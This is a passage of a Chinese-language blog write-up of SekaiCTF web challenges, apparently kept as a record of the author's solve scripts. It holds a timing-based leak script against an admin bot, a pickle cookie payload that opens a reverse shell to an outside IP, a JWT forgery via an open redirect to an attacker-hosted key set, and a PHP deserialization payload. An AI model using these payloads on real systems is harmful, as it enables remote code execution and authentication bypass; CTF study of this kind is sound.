class="params">err</span>=&gt;</span><span class="number">1</span>)</span></span><br><span class="line"><span class="language-javascript">          <span class="keyword">let</span> end = performance.<span class="title function_">now</span>()</span></span><br><span class="line"><span class="language-javascript">          t += end - s</span></span><br><span class="line"><span class="language-javascript">          <span class="variable language_">console</span>.<span class="title function_">log</span>(end - s)</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">const</span> avg = t/round</span></span><br><span class="line"><span class="language-javascript">        <span class="title function_">send</span>(str + <span class="string">&quot;,&quot;</span> + t + <span class="string">&quot;,&quot;</span> + <span class="string">&quot;avg:&quot;</span> + avg)</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">        <span class="comment">/*</span></span></span><br><span class="line"><span class="comment"><span class="language-javascript">          I get this threshold(1000ms) by trying multiple times on remote admin bot</span></span></span><br><span class="line"><span class="comment"><span class="language-javascript">          for example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold</span></span></span><br><span class="line"><span class="comment"><span class="language-javascript">        */</span></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">const</span> isFound = (t &gt;= <span class="number">200</span>)<span class="comment">//本地测试200ms够了</span></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">if</span> (isFound) &#123;</span></span><br><span class="line"><span class="language-javascript">          inp2.<span class="property">value</span> = <span class="string">&quot;0&quot;</span><span class="comment">//根据结果移除排在上面的还是下面的</span></span></span><br><span class="line"><span class="language-javascript">        &#125; <span class="keyword">else</span> &#123;</span></span><br><span class="line"><span class="language-javascript">          inp2.<span class="property">value</span> = <span class="string">&quot;1&quot;</span></span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">        <span class="comment">// remember to delete the post to not break our leak oracle</span></span></span><br><span class="line"><span class="language-javascript">        f2.<span class="title function_">submit</span>()</span></span><br><span class="line"><span class="language-javascript">        <span class="built_in">setTimeout</span>(<span class="function">() =&gt;</span> &#123;</span></span><br><span class="line"><span class="language-javascript">          <span class="title function_">resolve</span>(isFound)</span></span><br><span class="line"><span class="language-javascript">        &#125;, <span class="number">200</span>)</span></span><br><span class="line"><span class="language-javascript">      &#125;, <span class="number">100</span>)</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    </span></span><br><span class="line"><span class="language-javascript">  </span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>官方wp的方法由于要个域名，暂时没有能力仔细实验下</p>
<p>其他的题目我不是很感兴趣，就简单记录下脚本(这样就可以把电脑上的一堆脚本删了)</p>
<h3 id="Bottle-Poem"><a href="#Bottle-Poem" class="headerlink" title="Bottle Poem"></a>Bottle Poem</h3><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> bottle <span class="keyword">import</span> route, run, template, request, response, error</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Exploit</span>():</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__reduce__</span>(<span class="params">self</span>):</span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">exec</span>, (<span class="string">&#x27;import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;118.195.149.50&quot;,7575));subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())&#x27;</span>, )</span><br><span class="line"></span><br><span class="line"><span class="meta">@route(<span class="params"><span class="string">&quot;/sign&quot;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        session = &#123;<span class="string">&quot;name&quot;</span>: <span class="string">&quot;admin&quot;</span>,<span class="string">&quot;s&quot;</span>:Exploit()&#125;</span><br><span class="line">        response.set_cookie(<span class="string">&quot;name&quot;</span>, session, secret=<span class="string">&quot;Se3333KKKKKKAAAAIIIIILLLLovVVVVV3333YYYYoooouuu&quot;</span>)</span><br><span class="line">    <span class="keyword">except</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;error&quot;</span></span><br><span class="line"></span><br><span class="line">run(host=<span class="string">&#x27;localhost&#x27;</span>, port=<span class="number">8080</span>, debug=<span class="literal">True</span>)</span><br></pre></td></tr></table></figure>

<h3 id="Issues"><a href="#Issues" class="headerlink" title="Issues"></a>Issues</h3><p>这个题让我学会了用bp的一个插件，这里记录下这个插件的用法</p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/337347.html">https://www.freebuf.com/articles/web/337347.html</a></p>
<p>测试脚本与解题无关</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">from</span> urllib.parse <span class="keyword">import</span> urlparse</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> jwt</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_public_key</span>():</span><br><span class="line">    resp = requests.get(<span class="string">&quot;http://issues-3m7gwj1d.ctf.sekai.team/logout?redirect=http://118.195.149.50/jwks.json&quot;</span>)</span><br><span class="line">    resp = resp.json()</span><br><span class="line">    key = resp[<span class="string">&quot;keys&quot;</span>][<span class="number">0</span>][<span class="string">&quot;x5c&quot;</span>][<span class="number">0</span>]</span><br><span class="line">    <span class="keyword">return</span> key</span><br><span class="line"></span><br><span class="line">token = <span class="string">&quot;eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImlzc3VlciI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9sb2dvdXQ_cmVkaXJlY3Q9aHR0cDovLzExOC4xOTUuMTQ5LjUwL2p3a3MuanNvbiJ9.eyJ1c2VyIjoiYWRtaW4ifQ.UA2J8c-gjkDG3HYroWO2VYTgA1KFV0g-1gQna6FZwdUZ1FGPI9e_5BVz0Myi7JvBSpi6XG-knER5xuRpJJGXUe0oJx_rJbXua1r08eELXD4JQD1Txy6n_jsiKNp_OaxXtdJbsZftn3ugJ7gu_ZBfmxLVlvXDwSw15sFDm_3ROtb5mlrAI_AKjCl3LDYk0WrmJPk2Jp_3rjY0m92usAVNis3QGRdpXPa6SF-zwkEwDdID7P7f_QQiFJsJISFTLNYZ-k8DHJz19kCrUa_zemMiaOKxGBEdazfEhz5Uupbvm7vq9wsfbgEaYvphUsE-gqv-4iNAQFHWaNwhS_EhwxwnYA&quot;</span></span><br><span class="line">pubkey = get_public_key()</span><br><span class="line">pubkey = <span class="string">&quot;-----BEGIN PUBLIC KEY-----\n&#123;pubkey&#125;\n-----END PUBLIC KEY-----&quot;</span>.<span class="built_in">format</span>(pubkey=pubkey).encode()</span><br><span class="line"></span><br><span class="line"><span class="comment"># decoded_token = jwt.decode(token, pubkey, algorithms=[&quot;RS256&quot;])</span></span><br><span class="line"><span class="comment"># print(decoded_token)</span></span><br><span class="line"><span class="built_in">print</span>(pubkey.decode())</span><br><span class="line"><span class="comment"># decoded_token = jwt.decode(token, pubkey, algorithms=[&quot;RS256&quot;])</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="Sekai-Game-Start"><a href="#Sekai-Game-Start" class="headerlink" title="Sekai Game Start"></a>Sekai Game Start</h3><p><a target="_blank" rel="noopener" href="https://bugs.php.net/bug.php?id=81151">https://bugs.php.net/bug.php?id=81151</a></p>
<p>这里我之前看到disord里有人讨论说貌似有方法能让<code>Sekai_Game</code>反序列化后有属性，后面没事做再来看看</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">?sekai[game.run=</span><br><span class="line">C:<span class="number">10</span>:<span class="string">&quot;Sekai_Game&quot;</span>:<span class="number">0</span>:&#123;&#125;</span><br><span class="line">C:<span class="number">10</span>:<span class="string">&quot;Sekai_Game&quot;</span>:<span class="number">16</span>:&#123;s:<span class="number">5</span>:<span class="string">&quot;start&quot;</span>;b:<span class="number">1</span>;&#125;<span class="comment">//这样貌似可以？</span></span><br><span class="line"><span class="keyword">try</span> it</span><br><span class="line">it run :))))</span><br></pre></td></tr></table></figure>

<h3 id="Crab-Commodities"><a href="#Crab-Commodities" class="headerlink" title="Crab Commodities"></a>Crab Commodities</h3><p>推荐看官方wp，非预期就是直接溢出</p>

            </section>

            <footer class="article-footer">
              <div class="share-area lazyload">
                <ul>
                  <li>
                    <a href="https://twitter.com/Siebene7" target="_blank">
                      <i class="fab fa-twitter"></i>
                    </a>
                  </li>
                </ul>
              </div>
            </footer>
          </article>
        </main>
      </div>
    </div>


  </body>
  <footer
class="footer"
role="contentinfo"
itemscope
itemtype="http://schema.org/WPFooter">
<div id="inner-footer" class="wrap cf lazyload">
  <div
    id="footerlogo"
    class="h1 lazyload"
    itemscope
    itemtype="http://schema.org/Organization">
    <a href="/" rel="nofollow">
      <img
        src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="
        alt="Siebene@ Blog"
        data-src="/images/logo.png"
        class="lazyload"
      />
    </a>
  </div>

  <nav role="navigation">
    <div class="footer-links cf lazyload">
      <ul id="menu-main_navi" class="nav footer-nav cf">
        <li
          class="menu-item menu-item-type-custom menu-item-object-custom">
          <a href="/">Home</a>
        </li>

      </ul>
    </div>
  </nav>

  <p class="source-org copyright">&copy; 2023 Siebene@ Blog.</p>
</div>
</footer>
</div>


<script type="text/javascript" src="/js/7e07c3bc5b.js"></script>
<script type="text/javascript" src="/js/jquery.mobile.events.min.js"></script>
<script type="text/javascript" src="/js/jquery.last-sidebar.min.js"></script>
<script type="text/javascript" src="/js/script.min.js"></script>
<script type='text/javascript' src='/js/owl.carousel.min.js'></script>




</html>
